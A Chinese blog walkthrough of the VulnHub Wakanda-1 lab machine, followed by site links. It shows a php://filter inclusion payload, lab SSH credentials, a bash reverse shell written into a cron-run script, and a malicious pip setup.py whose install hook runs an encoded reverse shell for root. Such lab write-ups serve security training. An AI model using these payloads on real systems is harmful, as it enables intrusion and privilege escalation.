wakanda-1靶机

最新推荐文章于 2024-10-09 12:51:00 发布
最新推荐文章于 2024-10-09 12:51:00 发布
阅读量1.4k 收藏 21
点赞数 30
文章标签: chrome 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74232792/article/details/140937027
版权

环境配置

主机发现,注意找mac地址对应的ip

端口目录扫描

首页

查看首页源代码

拼接参数存在php伪协议的文件包含,包含首页文件inde.php

/?lang=php://filter/read=convert.base64-encode/resource=index

去在线平台base64解码,

ssh连接 mamadou : Niamey4Ever227!!!

提权

这是一个python环境,家目录下有个flag文件

查看其他目录文件

home/devops下有个flag2,但没有读取权限

在/srv发现一个隐藏文件.antivirus.py,该文件任意用户都有写权限,但没有执行权限

还发现一个test文件,仔细观察后发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断调用.antivirus.py

os.system('/bin/bash')切换终端

将.antivirus.py文件修改为反弹shell的代码

import os

os.system("echo 'bash -i >& /dev/tcp/192.168.0.107/6767 0>&1'|bash")

kali监听

sudo -l,尝试pip的sudo提权

在tmp目录下创建恶意文件,注意修改rhost为靶机地址

from setuptools import setup

from setuptools.command.install import install

import base64

import os

class CustomInstall(install):

def run(self):

install.run(self)

RHOST = '192.168.7.11'

reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 7777; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST

encoded = base64.b64encode(reverse_shell)

os.system('echo %s|base64 -d|bash' % encoded)

setup(name='FakePip',

version='0.0.1',

description='This will exploit a sudoer able to /usr/bin/pip install *',

url='https://github.com/0x00-0x00/fakepip',

author='zc00l',

author_email='andre.marques@esecurity.com.br',

license='MIT',

zip_safe=False,

cmdclass={'install': CustomInstall})

sudo -H /usr/bin/pip install . --upgrade --force-reinstall

随机反弹到root的shell

.南捱
关注
wakanda-widgets:自定义小部件集成到 Wakanda 框架和 Wakanda GUI 设计器中
06-01
Wakanda-widgets 在此存储库中,您可以与社区共享您的自定义 Wakanda 小部件。 如何为创建自定义小部件 有关创建自定义小部件的信息,请参阅文档。 如何请求将您的小部件添加到此列表中 要将小部件的存储库添加到...
angular-wakanda-upload
05-22
以上就是"angular-wakanda-upload"示例的基本工作原理。通过结合AngularJS的强大功能和Wakanda的全栈JavaScript环境,我们可以构建出高效、健壮的文件上传系统。对于开发者来说,这种组合提供了一种无缝的开发体验,...
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1093
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
靶机wakanda_1练习报告
黑战士的博客
05-21 559
1.熟练使用多种提权方法。
vulnhub系列:wakanda-1
jq_j37的博客
08-08 432
vulnhub系列:wakanda-1靶机,打靶文章
wakanda-1
weixin_52953960的博客
08-08 271
发现 /srv/.antivirus.py 文件会将内容写入到 /tmp/test 中。80端口没发现什么功能点,尝试ssh登录,网站首页发现一个可能作为用户的字符串。进入 devops目录,发现flag2文件,但是没有权限。网上搜了下exp,创建一个setup.py,在其中写入。查看当前权限,查看内核版本,没有找到合适的提权方式。开启临时web服务,将其下载到 /tmp 目录中。kali开启监听,等一会儿,成功反弹shell。靶机执行命令,成功反弹shell,提权成功。贴到url中,发现变成了法语。
wakanda:1靶机
zdd1453691081的博客
08-08 1470
靶机运行环境:Virtual Box
wakanda:1靶机渗透测试
weixin_58786230的博客
08-08 885
使用命令cd /tmpls -al。
【vulnhub】Wakanda :1靶机
wbplife的博客
08-07 678
lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面。
vulnhub-wakanda 1靶机
wjSteve的博客
09-29 1925
网站底下写着站长mamadou,猜测是他的密码,尝试连接,之间扫描到ssh端口为3333。现在获取到了devops的shell,之前搜索文件时看到他的家目录有第二个flag。在tmp文件夹下找到文件test,里面什么都没有,但是这个文件属于devops。在kali创建文件后,开启Python的HTTP服务,在靶机下载文件。看起来这个文件在不停的执行命令,并且我们有写入权限,写个木马进去。虽然扫到了,但是所有页面大小都是0B,也就是没有任何内容返回。导入靶机,放在kali同网段,扫描。
靶机渗透之Wakanda
qq_43235703的博客
02-02 2820
渗透靶机Wakanda wakanda简介:Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。在官网可以下载,有需要的小伙伴可以私聊我拿ova. 将wakanda.ova放进vmbox里面,要是vmware能放也可以放进去,不过vmbox可以直接加...
wakanda-studio-code-mirror
07-12
======================================== Wakanda Studio 的代码镜像扩展 Wakanda Studio 的基于代码镜像的代码编辑器。 特征 处理 emmet 缩写 ( ) 良好的压痕 HTML 预览(每次保存时重新加载) 编辑器的主题...
wakanda-node:Wakanda数据库的简单节点连接器
04-29
npm i -S midrissi/wakanda-node 初始化连接器 初始化程序返回一个Promise(有关更多信息,请参阅 ) var wakanda = require ( 'wakanda-node' ) ; var promise = wakanda . init ( { remote : { host : '...
wakanda-textreader
05-16
#创建对象 var TextReader = require ( "textreader" ) ;... //this call will change the position value to position + 1 #从位置读取 readFromTo(start, end) ,其中end不包含在返回的字符串中。 var str = tr
Linux网络编程
weixin_43364551的博客
10-04 1180
主要介绍了自学过程中的一些网略编程知识,包括进程相关,TCP/IP,网络I/O等。
Chromium 中chrome.cookies扩展接口c++实现分析
杰克东的专栏
10-08 636
至此分析完毕,如果想拦截 chrome.cookies.getAll等方法在 chrome\browser\extensions\api\cookies\cookies_api.cc中更改即可。此文件是cookies.json 定义的一个c++实现,自动生成请勿手动更改【tools\json_schema_compiler\compiler.py】。一、看下c++提供 的cookies接口定义 chrome\common\extensions\api\cookies.json。
chrome extension创建新的window
南巷清风
10-09 210
【代码】chrome extension创建新的window。
Chromium 中chrome.bookmarks扩展接口c++实现
最新发布
杰克东的专栏
10-09 913
总结:扩展通过chrome.bookmarks.get 等方法调用会进入此实现,需要拦截更改可以在此处修改。API 创建、整理以及以其他方式操纵书签。(可用于创建自定义“书签管理器”页面)。二、扩展接口c++定义。
JavaScript技巧集锦:提升效率与安全的45个实战技巧
JavaScript作为全球最流行的编程语言,广泛应用于网页、移动混合应用(如PhoneGap或Appcelerator)、服务器端(如NodeJS或Wakanda)以及众多其他实现。对于许多初入编程世界的开发者来说,JavaScript是一个很好的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值